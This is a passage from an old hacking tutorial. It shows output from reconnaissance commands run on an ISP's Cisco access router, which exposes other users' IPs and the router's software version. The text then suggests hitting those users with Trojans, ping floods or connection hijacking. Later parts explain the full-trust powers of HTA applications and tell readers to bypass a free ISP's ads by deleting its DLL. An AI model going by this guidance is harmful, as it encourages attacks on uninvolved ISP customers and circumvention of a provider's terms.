Sync PPP 00:00:00 Se6:7 genpr Sync PPP - Se6:11 bcddel Sync PPP - Se6:12 exhibind Sync PPP - Se6:14 samair Sync PPP 00:00:03 Se6:19 gosind Sync PPP 00:00:01 Se6:26 netcafe Sync PPP - Interface User Mode Idle Peer Address Now, what was that? Well not only did the 'who' command display the Usernames and the time online, but it also displayed the IP's of all people online.Now all you need to do is send a Trojan or something and start controling the victim's computer.Or maybe try some DOS attacks or even start ping flooding the victim. One may also send the disconnect string to the victim's modem to disconnect him or maybe even Hijack his connection.We will learn about this in a later issue. Usually the systat and the who command 'who' command show display the same results, but on my ISP, they brought about different varied results. Another valuable command is the 'show' command which when used with the 'version' parameter displays the version of the OS running on the remote Router In this case I find that my ISP has Cisco Routers running the Cisco OS. Now any hacker can easily look for a hole in this particular version of OS running on the Router and get root previledges. delhinas4>show version Cisco Internetwork Operating System Software IOS (tm) 5300 Software (C5300-I-M), Version 11.3(9)T, RELEASE SOFTWARE (fc1) Copyright (c) 1986-1999 by cisco Systems, Inc. Compiled Thu 08-Apr-99 10:54 by pwade Image text-base: 0x60008920, data-base: 0x60550000 ROM: System Bootstrap, Version 11.2(9)XA, RELEASE SOFTWARE (fc2) BOOTFLASH: 5300 Software (C5300-D-M), Version 11.3(9.2)T, MAINTENANCE INTERIM SOFTWARE delhinas4 uptime is 7 weeks, 1 day, 7 hours, 52 minutes System restarted by power-on System image file is "flash:c5300-i-mz_113-9_T.bin", booted via flash cisco AS5300 (R4K) processor (revision A.32) with 32768K/16384K bytes of memory. Processor board ID 11494401 R4700 processor, Implementation 33, Revision 1.0 (512KB Level 2 Cache) Channelized E1, Version 1.0. Bridging software. X.25 software, Version 3.0.0. Primary Rate ISDN software, Version 1.1. Backplane revision 2 Manufacture Cookie Info: EEPROM Type 0x0001, EEPROM Version 0x01, Board ID 0x30, --More-- Board Hardware Version 1.64, Item Number 800-2544-2, Board Revision B0, Serial Number 11494401, PLD/ISP Version 0.0, Manufacture Date 8-Dec-1998. 1 Ethernet/IEEE 802.3 interface(s) 1 FastEthernet/IEEE 802.3 interface(s) 31 Serial network interface(s) 120 terminal line(s) 4 Channelized E1/PRI port(s) 128K bytes of non-volatile configuration memory. 8192K bytes of processor board System flash (Read/Write) 4096K bytes of processor board Boot flash (Read/Write) Configuration register is 0x2102 The show command has some very useful paramters which can be used to get a lot of info.To get an entire list of parameters and a single line description, type: delhinas4>show ? WORD Flash device information - format [partition] bootflash Boot Flash information calendar Display the hardware calendar clock Display the system clock context Show context information dialer Dialer parameters and statistics history Display the session command history hosts IP domain-name, lookup style, nameservers, and host table isdn ISDN information location Display the system location modem Modem Management or CSM information modemcap Show Modem Capabilities database ppp PPP parameters and statistics rmon rmon statistics sessions Information about Telnet connections snmp snmp statistics tacacs Shows tacacs+ server statistics tdm TDM connection information terminal Display terminal configuration parameters traffic-shape traffic rate shaping configuration users Display information about terminal lines version System hardware and software status --More-- The following are the results that I get when I try out the kewl parameters of the show command. delhinas4>show calendar 16:19:06 UTC Sun Apr 16 2000 delhinas4>show hosts Default domain is bol.net.in Name/address lookup uses domain service Name servers are 203.xx.243.70, 203.xx.227.70 Host Flags Age Type Address(es) delhinas4>show modem Avg Hold Inc calls Out calls Busied Failed No Succ Mdm Time Succ Fail Succ Fail Out Dial Answer Pct. 1/0 00:10:43 1375 375 0 0 0 0 125 78% 1/1 00:10:52 1392 370 0 0 0 2 126 79% * 1/2 00:11:36 1388 329 0 0 0 0 100 80% * 1/3 00:12:19 1347 328 0 0 0 0 114 80% 1/4 00:12:34 1326 334 0 0 0 2 101 79% * 1/5 00:11:30 1375 341 0 0 0 1 85 80% 1/6 00:12:26 1358 326 0 0 0 3 94 80% * 1/7 00:11:20 1402 322 0 0 0 1 96 81% * 1/8 00:11:26 1388 335 0 0 0 1 107 80% 1/9 00:13:05 1328 313 0 0 0 3 111 80% 1/10 00:10:59 1402 336 0 0 0 0 107 80% 1/11 00:12:31 1349 323 0 0 0 1 115 80% 1/12 00:13:12 1303 309 0 0 0 6 96 80% * 1/13 00:12:11 1339 337 0 0 0 2 103 79% * 1/14 00:11:08 1398 337 0 0 0 2 103 80% 1/15 00:12:28 1328 342 0 0 0 3 96 79% * 1/16 00:11:18 1416 320 0 0 0 2 96 81% 1/17 00:11:41 1118 275 0 0 0 1 84 80% * 1/18 00:12:03 1324 352 0 0 0 2 106 78% 1/19 00:11:29 1369 371 0 0 0 1 120 78% 1/20 00:11:25 1323 372 0 0 0 2 109 78% --More-- 1/21 00:10:40 1431 340 0 0 0 2 111 80% 1/22 00:12:12 1343 329 0 0 0 3 101 80% 1/23 00:11:40 1363 330 0 0 0 0 102 80% * 1/24 00:12:22 1340 317 0 0 0 0 113 80% * 1/25 00:11:36 1383 348 0 0 0 3 128 79% * 1/26 00:14:09 1297 294 0 0 0 1 99 81% * 1/27 00:10:25 1436 359 0 0 0 1 103 80% 1/28 00:11:08 1411 331 0 0 0 1 95 80% 1/29 00:10:25 1438 343 0 0 0 0 99 80% * 1/30 00:10:35 1443 352 0 0 0 2 104 80% * 1/31 00:11:06 1434 325 0 0 0 0 108 81% 1/32 00:11:30 1379 358 0 0 0 0 122 79% 1/33 00:11:04 1406 345 0 0 0 2 107 80% * 1/34 00:12:38 1321 338 0 0 0 0 105 79% 1/35 00:12:14 1346 326 0 0 0 2 104 80% * 1/36 00:11:13 1400 333 0 0 0 0 101 80% 1/37 00:11:52 1338 363 0 0 0 1 99 78% 1/38 00:13:19 1262 322 0 0 0 0 113 79% * 1/39 00:11:39 1366 341 0 0 0 2 93 80% 1/40 00:10:34 1380 396 0 0 0 0 122 77% 1/41 00:10:36 1417 356 0 0 0 0 115 79% 1/42 00:11:16 1404 306 0 0 1 3 95 82% 1/43 00:11:43 1418 326 0 0 1 1 106 81% --More-- 1/44 00:11:25 1347 367 0 0 1 2 105 78% 1/45 00:11:22 1371 362 0 0 1 0 111 79% * 1/46 00:12:08 1326 340 0 0 1 1 92 79% 1/47 00:11:47 1365 358 0 0 1 1 111 79% * 1/48 00:11:35 1359 341 0 0 0 2 98 79% 1/49 00:11:12 1376 359 0 0 0 2 99 79% * 1/50 00:12:10 1370 345 0 0 0 4 109 79% * 1/51 00:12:00 1375 319 0 0 0 2 117 81% * 1/52 00:11:41 1390 322 0 0 0 0 98 81% 1/53 00:12:49 1330 330 0 0 0 0 98 80% 1/54 00:11:35 1396 327 0 0 0 2 92 81% * 1/55 00:12:43 1354 301 0 0 0 1 83 81% 1/56 00:11:31 1379 341 0 0 0 1 109 80% 1/57 00:12:00 1369 324 0 0 0 2 96 80% 1/58 00:12:03 1342 361 0 0 0 0 103 78% 1/59 00:12:17 1305 349 0 0 0 1 101 78% * 2/0 00:12:11 1337 362 0 0 0 0 107 78% 2/1 00:14:01 1251 322 0 0 0 2 98 79% 2/2 00:12:34 1328 322 0 0 0 0 109 80% 2/3 00:12:24 1358 318 0 0 0 0 105 81% 2/4 00:12:24 1356 309 0 0 0 0 97 81% 2/5 00:10:14 1451 344 0 0 0 1 103 80% 2/6 00:12:18 1333 340 0 0 0 0 105 79% --More-- * 2/7 00:12:35 1333 335 0 0 0 0 108 79% 2/8 00:11:17 1427 346 0 0 0 1 129 80% * 2/9 00:12:07 1361 299 0 0 0 0 95 81% 2/10 00:10:47 1407 370 0 0 0 0 98 79% 2/11 00:11:07 1409 333 0 0 0 2 102 80% 2/12 00:10:51 1444 323 0 0 0 2 110 81% * 2/13 00:10:11 1393 406 0 0 0 3 115 77% 2/14 00:12:31 1228 315 0 0 0 2 110 79% 2/15 00:10:41 1405 361 0 0 0 0 113 79% 2/16 00:12:44 1357 295 0 0 0 0 87 82% * 2/17 00:11:15 1362 355 0 0 0 1 102 79% 2/18 00:11:30 1363 343 0 0 0 1 105 79% 2/19 00:11:49 1349 350 0 0 0 1 110 79% * 2/20 00:11:40 1341 347 0 0 0 3 102 79% 2/21 00:11:40 1374 341 0 0 0 2 98 80% 2/22 00:11:41 1378 329 0 0 0 0 101 80% 2/23 00:12:35 1335 322 0 0 0 0 100 80% 2/24 00:12:33 1353 309 0 0 0 1 91 81% 2/25 00:11:36 1371 330 0 0 0 3 106 80% * 2/26 00:11:18 1403 332 0 0 0 1 107 80% * 2/27 00:11:56 1349 350 0 0 0 0 115 79% * 2/28 00:10:41 1421 340 0 0 0 0 110 80% 2/29 00:11:49 1352 326 0 0 0 0 116 80% --More-- * 2/30 00:10:21 1446 353 0 0 0 1 120 80% 2/31 00:11:33 853 219 0 0 0 0 69 79% 2/32 00:12:09 1361 339 0 0 0 0 101 80% 2/33 00:11:20 1388 346 0 0 0 1 113 80% 2/34 00:12:27 1340 312 0 0 0 0 106 81% 2/35 00:12:02 1348 340 0 0 0 3 101 79% 2/36 00:11:18 1368 349 0 0 0 4 111 79% 2/37 00:12:21 1346 320 0 0 0 2 116 80% 2/38 00:11:59 1377 330 0 0 0 1 108 80% 2/39 00:11:53 1406 303 0 0 0 0 98 82% * 2/40 00:12:39 1340 335 0 0 0 1 97 80% 2/41 00:11:20 1386 352 0 0 0 0 113 79% * 2/42 00:11:06 1384 351 0 0 0 2 111 79% * 2/43 00:12:15 1359 331 0 0 0 0 107 80% 2/44 00:12:04 1365 331 0 0 0 1 95 80% 2/45 00:11:04 1411 316 0 0 0 1 93 81% * 2/46 00:12:02 1338 349 0 0 0 2 97 79% 2/47 00:11:30 1396 345 0 0 0 0 91 80% * 2/48 00:11:04 1406 338 0 0 0 3 108 80% * 2/49 00:11:42 1368 349 0 0 0 0 114 79% 2/50 00:12:09 1329 339 0 0 0 2 112 79% * 2/51 00:11:56 1341 335 0 0 0 1 107 80% * 2/52 00:10:42 1376 372 0 0 0 4 110 78% --More-- 2/53 00:12:28 1309 345 0 0 0 1 122 79% * 2/54 00:13:29 1315 295 0 0 0 1 90 81% 2/55 00:11:22 1379 363 0 0 0 2 114 79% * 2/56 00:13:40 1264 335 0 0 0 2 90 79% 2/57 00:11:03 1367 367 0 0 0 1 128 78% 2/58 00:10:58 1382 360 0 0 0 1 103 79% * 2/59 00:12:11 1372 313 0 0 0 3 88 81% Total: 00:11:45 163207 40377 0 0 6 146 12548 80% delhinas4>show clock *16:19:42.948 UTC Sun Apr 16 2000 delhinas4>show terminal Line 61, Location: "", Type: "" Length: 24 lines, Width: 80 columns Status: Ready, Active, No Exit Banner, Modem Detected Capabilities: Hardware Flowcontrol In, Hardware Flowcontrol Out Modem Callout, Modem RI is CD, Line usable as async interface Output non-idle, Modem Autoconfigure, Integrated Modem Modem state: Ready modem(slot/port)=2/0, state=CONNECTED dsx1(slot/unit/channel)=0/1/20, status=VDEV_STATUS_ACTIVE_CALL.VDEV_STATUS_ALLOCATED. Modem hardware state: CTS DSR DTR RTS, Modem Configured Special Chars: Escape Hold Stop Start Disconnect Activation ^^x none - - none Timeouts: Idle EXEC Idle Session Modem Answer Session Dispatch 00:10:00 00:20:00 none not set Session idle time reset by output. Idle Session Disconnect Warning 00:01:00 Login-sequence User Response 00:00:30 Autoselect Initial Wait not set Modem type is new_modemcap3. Session limit is not set. --More-- delhinas4>show dialer Serial0:0 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:1 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:2 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:3 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:4 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) --More-- Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:5 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:6 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:7 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:8 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle --More-- Serial0:9 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:10 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:11 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:12 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:13 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) --More-- Dialer state is idle Serial0:14 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:15 - dialer type = ISDN Dial String Successes Failures Last called Last status 0 incoming call(s) have been screened. 0 incoming call(s) rejected for callback. Serial0:16 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:17 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle --More-- Serial0:18 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:19 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:20 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:21 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:22 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) --More-- Dialer state is idle Serial0:23 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:24 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:25 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:26 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:27 - dialer type = ISDN --More-- Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:28 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:29 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle Serial0:30 - dialer type = ISDN Idle timer (600 secs), Fast idle timer (20 secs) Wait for carrier (30 secs), Re-enable (15 secs) Dialer state is idle delhinas4>show snmp Chassis: 11494401 646497 SNMP packets input 0 Bad SNMP version errors 0 Unknown community name 0 Illegal operation for community name supplied 1 Encoding errors 2402516 Number of requested variables 4 Number of altered variables 8281 Get-request PDUs 638211 Get-next PDUs 4 Set-request PDUs 918646 SNMP packets output 0 Too big errors (Maximum packet size 1500) 67 No such name errors 0 Bad values errors 0 General errors 646496 Response PDUs 272150 Trap PDUs SNMP logging: enabled Logging to 203.xx.243.63.162, 0/10, 270949 sent, 1201 dropped. delhinas4>show history(This command displays a list of commands that you have typed since your last login.) show terminal how show tacas show dialer who mstat localhost help where show history SO this way you can use the Post Dial Up Screen which I hope you would now call the Router Prompt to get more information on Users and also the Server of your ISP itself. Making Your Own Browser (HTML APPLICATIONS) I felt that this manual wasn't complete without a mention of HTA Applications. HTA Applications are basically HTML Applications which are unfortunately supported only by Internet Explorer 4 and above.An HTA Application is actually a full fledged application.With the development of HTA's Internet Explorer can now be used for creating and distributing full fledged powerful applications over the net.Basically HTA's are a cross between normal .exe files and the web pages that are displayed by Internet Explorer. Normally only proper programming languages like C++ or Perl or VisualBasic had the access to system resources, but with the introduction of HTA's, this power now extends to DHTML(Dynamic HyperText MarkUp Language).HTA not only supports everything that a normal webpage supports like, CSS (Cascading Style Sheets),scripting languages,methods behaviours etc, but also gives the developer access to the client's system, an opportunity to control the User Interface of the Application,and many various other aspects which we couldn't control earlier.Best of all, it runs as a trusted application, which menas it is not tied down with the same security restrictions, normal web pages are subjected to.A HTA behaves like a normal .exe file, with the user being asked once, before the HTA is downloaded, whether to save or run the application; if saved to the client's system,it can be executed anytime later, just like a normal .exe file can be. A HTA application is nothing but a .html file saved with a .hta extension name.The only difference between the commands that can be used on a web page and the commands that can be used on a HTA Application are the addition of some new commands which are native to HTA Applications.An HTA Application can be executed by either double-clicking its program icon, or running it from the Start menu, opening it through a URL, or by starting it from the command line. Now before we move on to HTA Specific commands, let's write the mandatory Hello World! Program.This program is just for the formality sake, so that you get the basic idea, as to how a HTA functions and it is Okay even if you do not understand anything yet.Just Copy the following piece of code and save it with any name of your choice, just make sure that My First HTA Hello World!!! The .hta extension tells the system ,how to handle this particular application.The new HTA:APPLICATION tells the application windows, how to behave as a application.This new tag has many attributes which give us complete control over the function and the Application Windows of our HTA.This new HTA:APPLICATION tag should appear within the HEAD tag and should contain the necesarry attributes which control features of the HTA which are not available in DHTML..Now to understand the HTA specific attributes, lets take the following example: My First HTA Application We conclude the following from the above piece of code: 1. When launched the HTA is known to the system as My First HTA APP(Controlled by Applicationname attribute. 2. The HTA App does not have a border.(Controlled by Border Attribute.) When border is set to none, neither the window border, program icon, title bar, nor Minimize and Maximize buttons will display. 3. The HTA App will have a title bar or a caption bar.(Controlled by Caption Attribute.) When CAPTION is set to no, the Minimize and Maximize buttons, the program icon, and the window border are disabled. 4. The Icon which is displayed in Explorer or in the taskbar or in the Title bar will be /icon.gif.(contolled by ICON attribute.) 5. The HTA App will not be shown in the taskbar.(Controlled by Showintaskbar.) 6. Only a single instance of the app can be launched at a particular time.(Controlled by Singleinstance.) 7. It will not have a standard system program icon.(Controlled by Sysmenu.) When sysMenu is set to no, not only the program icon, but also the Minimize and Maximize buttons are disabled. 8. The HTA Window will be by default launched maximised. 9. The id attribute works the same way, it normally does. When the above HTA is run, it shows the text within the tag on the caption bar of tha application, and the code within the <BODY> tag is executed. ********************* Hacking Truth: As HTA's are executed as fully trusted applications, they have the ability to carry out actions which Internet Explorer would never allow a regular web page to perform.HTA's have full permit to manipulate the client machine.It has read.write access to the client machine's files, and also the system registry.The command codes are also supported.They also allow cross domain scripting. Not only that, they also allow embedded Java Applets and ActiveX Controls to be run without any warning message irrespective of the security settings of the browser. To understand how HTA's security works, read the following excerpt from SBN: ------------------SBN-------------- HTA windows can extend the trust relationship to content in other domains. HTAs allow cross-domain script access between window objects and cookies. To address the security risks inherent in cross-domain scripting, HTA enables the APPLICATION attribute for FRAMEs and IFRAMEs. This HTA-only attribute is not the sole security precaution available. HTAs are designed such that FRAMEs and IFRAMEs, where the APPLICATION attribute is set to no, have no script access to the HTA containing them. In this way, no unsecure content is allowed into an HTA through an untrusted window. HTAs are designed such that untrusted HTML FRAMEs and IFRAMEs have no script access to the HTA containing them. In the case of FRAMEs that are not HTA-enabled, the highest level frame comprises the top window for all FRAMEs it contains. For that FRAME, window.top and window.self are one and the same. In addition, unsafe FRAMEs and IFRAMEs receive neither a referrer nor an opener URL from the parent HTA. The end result is that they are unaware of the containing HTA as the parent window. In applications where all content is safe, FRAMEs and IFRAMEs can safely be marked as trusted. Wizards and control panels are examples of safe content. The HTA-enabled status of the IFRAME in the example below permits it to pass information back to its parent window. <IFRAME SRC="filename.htm" APPLICATION="yes"> By contrast, an IFRAME that allows browsing to unsecured content must be implemented as regular HTML. Content in the IFRAME example below is subject to the security setting for its zone. The following IFRAME can be used when embedding HTML. <IFRAME SRC="filename.htm" APPLICATION="no"> Note The APPLICATION attribute is ignored if used in HTML rather than HTA. When running HTAs, users should take the same precautions as with any executable: Only install HTAs produced by reliable sources. HTAs cannot be code-signed. However, they can be installed from signed cabinet (.cab) files or other signed installation formats. Either way, the most accountable sources will be corporate intranets and established software vendors. -------------------------SBN---------------------------------- So one can see how dangerous from a normal person's viewpoint and how interesting from a hacker's viewpoint, HTA's can be.So basically to save yourself from evil Java Applets disable Java.Also run only those HTA's they are signed or you receive from trusted senders. ************************ The following is the code of a browser that actually is a HTA which I coded in HTML, Javascript.To understand how it was made and to improve the code, you will need basic knowledge of the two. This browser is based on the open source concept and anyone can contribute to it's code and improve it's functionality.So all you hardcore programmers, charge your grey cells and conrtibute to the development of this browser. All those of you who are new to hacking(programming)please, take my advice and learn atleast two or three programming language.For the time being use the below browser and start enjoying your browsing experience.Simple copy the following into notepad or anyother editor and save it with an extension name of .hta <html> <head> <TITLE>The Hacking Truths Browser. Address


Coded By: Ankit Fadia ankit@bol.net.in
Visit us at: http://hackingtruths.tripod.com/a> Removing Banners From Free ISP Services There are many new Internet Service Providers which give absolutely free Internet access, of course you do need to pay for the telephone bill. These free ISP's make money by the advertisements that they display in the form of a banner which covers a part of your screen each time you connect to the Internet. Well, these banners are quite a nuisance as they clog bandwidth and slow down our Internet Connection. The advertisements displayed by them, share your modem to load. Wanna learn how to remove this bar and still access the net for free? Well read on. The answer to this hack lies in some kewl files called Dynamic Link Libraries. First lets see what .dll files are used for. Dynamic Link Libraries is basically a collection of commands or data which control how a program looks. Take the example of Microsoft Office. Now whenever you launch it, the main .exe file reads the .dll file associated with it and accordingly displays the toolbars.[NOTE: Almost all Windows applications use the same .dll file to display say the Title Bar]. So basically we can conclude that .dll files are most commonly used to change the way applications look. Now the good thing about Dynamic Libraries is that they can be loaded or unloaded when a particular program has stopped using it. This is done to save resources or memory. They can also be shared at the same time by various applications. Now before we go on to the hack let's learn how these free ISP's work. When you click on the Connect button, the Modem dials into the FREE ISP and tries to connect. Before the connection is fully established, the FREE ISP software checks to see if the .dll file associated with exists or not. If yes, then it connects and a banner pops up. On the other hand, if the .dll file does not exist then the FREE ISP Software refuses to connect. So what you need to do in order to surf for free without the irritating Banner ads, first connect to the FREE ISP's server, and once the connection has been established (screeching sound stops), delete the .dll file associated with it. It is that simple. The only thing you need to know is which .dll file to delete. To find out the .dll files associated with your FREE ISP Software, install the software on a clean machine (where the same software has not been installed earlier). Then using the FIND tool (START >Find) locate all Dynamic Link Libraries (*.dll)which have been created or modifies during the last one day(Under the Date Modified Tab). This will be foolproof only if no other software has been installed during the last 24 hours. Ankit Fadia ankit@bol.net.in To receive more tutorials on Hacking, Perl, C++ and Viruses/Trojans join my mailing list: Send an email to programmingforhackers-subscribe@egroups.com to join it.